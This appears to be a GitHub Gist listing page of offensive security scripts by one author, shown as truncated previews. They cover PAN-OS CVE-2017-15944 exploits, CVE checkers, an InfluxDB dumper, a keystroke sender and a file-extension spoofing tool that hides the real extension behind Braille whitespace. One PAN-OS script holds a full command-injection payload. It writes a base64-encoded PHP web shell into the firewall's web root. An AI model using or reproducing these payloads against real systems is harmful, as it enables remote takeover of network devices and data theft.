Skip to content

Instantly share code, notes, and snippets.

import argparse
import os
import urllib.parse
# Reference: https://vulnera.com/newswire/void-banshee-apt-group-exploits-windows-mshtml-spoofing-vulnerability/?utm_source=rss&utm_medium=rss&utm_campaign=void-banshee-apt-group-exploits-windows-mshtml-spoofing-vulnerability
# Define the encoded Braille whitespace character sequence
BRAILLE_WHITESPACE = "%E2%A0%80" * 26
def create_spoofed_file(input_file, output_base, fake_extension):
@milo2012
milo2012 / CVE-2020-36289.py
Created August 6, 2024 03:43
CVE-2020-36289.py
import requests
import argparse
import re
from concurrent.futures import ThreadPoolExecutor, as_completed
from requests.packages.urllib3.exceptions import InsecureRequestWarning
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
requests.packages.urllib3.disable_warnings()
def check_usernames(file_path, base_url, num_threads):
@milo2012
milo2012 / searchMSIGetCustomActions.ps1
Last active July 25, 2024 08:26
searchMSIGetCustomActions.ps1
function Get-CustomActionsFromMSI {
param (
[string]$msiPath
)
try {
# Load the Windows Installer COM object
$installer = New-Object -ComObject WindowsInstaller.Installer
# Open the MSI database in read-only mode
import argparse
import requests
import re
def main():
# Parse command line arguments
parser = argparse.ArgumentParser(description='Dump data from a specific measurement/table in an InfluxDB instance via HTTP API.')
parser.add_argument('-u', '--url', type=str, required=True, help='URL of the InfluxDB query endpoint')
parser.add_argument('-d', '--database', type=str, help='Name of the database')
parser.add_argument('-t', '--table', type=str, help='Name of the measurement/table')
@milo2012
milo2012 / sendKeys.go
Created January 27, 2023 19:54
sendKeys.go
package main
import (
//"flag"
"log"
"fmt"
"strings"
"time"
"github.com/stephen-fox/user32util"
)
var timeout time.Duration = 1
@milo2012
milo2012 / CVE-2020-25780.py
Created February 8, 2022 06:11
CVE-2020-25780.py
import optparse
import requests
import xml.etree.ElementTree as ET
import xmltodict
import base64
def fixed_xml_body_as_string(filename):
text='<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:tem="http://tempuri.org/">'
text+=' <soapenv:Header/>'
text+=' <soapenv:Body>'
@milo2012
milo2012 / CVE-2017-15944_1.py
Created July 19, 2021 14:29
CVE-2017-15944_1.py
#!/usr/bin/env python
# encoding: utf-8
import requests
import sys
import base64
requests.packages.urllib3.disable_warnings()
session = requests.Session()
def step3_exp():
exp_post = "{\"action\":\"PanDirect\",\"method\":\"execute\",\"data\":[\"07c5807d0d927dcd0980f86024e5208b\",\"Administrator.get\",{\"changeMyPassword\":true,\"template\":\"asd\",\"id\":\"admin']\\\" async-mode='yes' refresh='yes' cookie='../../../../../../var/cores/$(echo PD9waHAgc3lzdGVtKCRfR0VUWyJjIl0pOz8+Cg==|base64 -d >${PATH:0:1}var${PATH:0:1}appweb${PATH:0:1}htdocs${PATH:0:1}api${PATH:0:1}cmd.php).core -print -exec python -c exec(\\\"PD9waHAgc3lzdGVtKCRfR0VUWyJjIl0pOz8+Cg==\\\".decode(\\\"base64\\\")) ;'/>\\u0000\"}],\"type\":\"rpc\",\"tid\":713}"
return exp_post
@milo2012
milo2012 / CVE-2017-15944_2.py
Last active July 19, 2021 14:26
CVE-2017-15944_2.py
#!/usr/bin/env python
# encoding: utf-8
import requests
import sys
import base64
import time
requests.packages.urllib3.disable_warnings()
session = requests.Session()
path = "/opt/var.cp/cores"
def step3_exp(command):
@milo2012
milo2012 / CVE-2017-15944.md
Last active June 22, 2023 08:07
CVE-2017-15944.md

Description

I encountered a situation where the target running PAN-OS was vulnerable to CVE-2017-15944 but I was unable to exploit it using Metasploit.

The issue with exploiting CVE-2017-15944

One of the techniques of exploiting CVE-2017-15944 exploit, is to create a file under /opt/pancfg/mgmt/logdb/traffic/1/* which gets processed by the cron job (/etc/cron.d/indexgen -> /usr/local/bin/genindex_batch.sh). Metasploit uses this technique.

The article at https://tinyhack.com/2019/01/10/alternative-way-to-exploit-cve-2017-15944-on-pan-os-6-1-0/ mentions that it might be impossible to exploit CVE-2017-15944 as the script is already running. The article mentions that the cron job (/etc/cron.d/core_compress -> /usr/local/bin/core_compress) is also vulnerable to command injection.

@milo2012
milo2012 / searchKaliPkg.py
Last active May 17, 2021 04:11
Search Kali Repo (http.kali.org)
import sys
import requests
import optparse
from bs4 import BeautifulSoup
import multiprocessing
from requests.packages.urllib3.exceptions import InsecureRequestWarning
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
requests.packages.urllib3.disable_warnings()
def getHTML(url):